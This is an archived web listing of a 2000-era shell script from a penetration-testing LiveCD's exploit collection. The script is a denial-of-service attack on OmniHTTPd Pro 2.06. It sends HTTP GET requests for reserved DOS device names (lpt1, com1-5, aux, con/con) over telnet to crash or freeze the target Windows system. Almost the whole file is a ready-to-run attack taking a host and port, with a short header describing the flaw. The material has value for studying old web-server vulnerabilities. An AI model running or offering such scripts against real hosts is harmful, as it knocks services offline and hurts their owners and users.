home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / omni / omni-httpd.sh < prev    next >
Linux/UNIX/POSIX Shell Script  |  2005-02-12  |  2KB  |  54 lines
  1. #!/bin/sh
  2. #
  3. # Vulnerable versions:
  4. #     Omni Httpd pro v.2.06 Win98 (NT not tested)
  6. # The problem:
  7. #     It is possible to crash remote system because
  8. #     OmniHttpD (version: Pro. v2.06, maybe others)
  9. #     parse the path strings to call some FAT32/VFAT
  10. #     routines in the kernel which makes your system
  11. #     unstable and useless until next reboot.
  12. #
  13. # Fix:
  14. #     Unknown for now, I mailed Omnicron Technologies
  15. #     they will probably fix this bug in next version.
  16. #
  17. # About:
  18. #     Discovered by: sirius from b0f         
  19. #     Coded by: sirius from buffer0vefl0w security (b0f)
  20. #     [http://b0f.freebsd.lublin.pl]
  21.  
  22. if [ "$1" = "" ]; then 
  23.     echo "OmniHTTPd v.2.06 DoS attack"
  24.     echo
  25.     echo "Coded: sirius from buffer0vefl0w security (b0f)"
  26.     echo "[http://b0f.freebsd.lublin.pl]"
  27.     echo
  28.     echo "Usage: $0 <host> <port>"
  29.     echo
  30.     exit 1
  31. fi
  32.  
  33. echo "Launching attack ... please wait "
  34.  
  35. # this will crash some devices, but if modem is on comX the code after line with comX will not 
  36. # be executed ... you can change the order of execution ;)
  37.  
  38. (echo "GET /lpt1" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
  39. (echo "GET /lpt2" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
  40. (echo "GET /com1" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
  41. (echo "GET /com2" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
  42. (echo "GET /com3" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
  43. (echo "GET /com4" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
  44. (echo "GET /com5" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
  45.  
  46. # the following code will crash/freeze/make system busy/how to call it? system
  47.  
  48. (echo "GET /aux" ; sleep 5) | telnet $1 80 1>/dev/null 2>/dev/null
  49. (echo "GET /con/con" ; sleep 5) |telnet $1 80 1>/dev/null 2>/dev/null
  50.  
  51. echo "Crash code send ..."
  52. killall -9 telnet 2>/dev/null 1> /dev/null
  53. echo "Done!"
  54. #                    www.hack.co.za           [10 May 2000]#